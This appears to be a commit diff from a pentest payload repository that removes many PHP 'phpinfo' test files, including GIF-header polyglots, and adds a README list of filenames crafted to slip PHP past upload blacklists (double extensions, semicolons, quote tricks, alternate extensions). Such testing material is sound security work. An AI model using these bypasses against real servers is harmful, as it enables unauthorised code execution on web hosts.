Zipped PHPInfo files
PinkDev1
BIN
Payloads/PHPInfo.zip
Normal file
|
|
@ -1,5 +0,0 @@
|
||||||
#!/bin/sh
|
|
||||||
zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
|
|
||||||
|
|
||||||
tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
|
|
||||||
|
|
||||||
|
Before Width: | Height: | Size: 7.2 KiB |
|
Before Width: | Height: | Size: 74 KiB |
|
|
@ -1,3 +0,0 @@
|
||||||
//tested on 7.2
|
|
||||||
// even with short_open_tag=0
|
|
||||||
<?=phpinfo()?>
|
|
||||||
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1 +0,0 @@
|
||||||
GIF89a1
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 28 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
Before Width: | Height: | Size: 29 B |
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
||||||
|
|
@ -44,4 +44,39 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
|
||||||
|
|
||||||
## POC_img_phpinfo File
|
## POC_img_phpinfo File
|
||||||
|
|
||||||
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
||||||
|
|
||||||
|
|
||||||
|
## PHPInfo.zip
|
||||||
|
|
||||||
|
This zip file containes files with filenames for bypassing blacklists and accessing `phpinfo.php`:
|
||||||
|
|
||||||
|
- ` make-aio.sh`
|
||||||
|
- ` phpinfo-aio.tar`
|
||||||
|
- ` phpinfo-aio.zip`
|
||||||
|
- `'phpinfo.""gif'`
|
||||||
|
- `'phpinfo."gif'`
|
||||||
|
- `"phpinfo.''gif"`
|
||||||
|
- `"phpinfo.'gif"`
|
||||||
|
- ` phpinfo.jpg.php`
|
||||||
|
- ` phpinfo-metadata.gif`
|
||||||
|
- ` phpinfo-metadata.jpg`
|
||||||
|
- ` phpinfo.php`
|
||||||
|
- ` phpinfo.php-1.gif`
|
||||||
|
- ` phpinfo.php-2.gif`
|
||||||
|
- ` phpinfo.php3`
|
||||||
|
- ` phpinfo.php4`
|
||||||
|
- ` phpinfo.php5`
|
||||||
|
- ` phpinfo.php7`
|
||||||
|
- `'phpinfo.php.""gif'`
|
||||||
|
- `'phpinfo.php."gif'`
|
||||||
|
- `"phpinfo.php.''gif"`
|
||||||
|
- `"phpinfo.php.'gif"`
|
||||||
|
- ` phpinfo.phpt`
|
||||||
|
- `'phpinfo.php;.txt'`
|
||||||
|
- ` phpinfo.pht`
|
||||||
|
- ` phpinfo.phtml`
|
||||||
|
- ` phpinfo-shortsyntax.php`
|
||||||
|
- ` phpinfo.txt`
|
||||||
|
|
||||||
|
It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.
|
||||||
|
|
|
||||||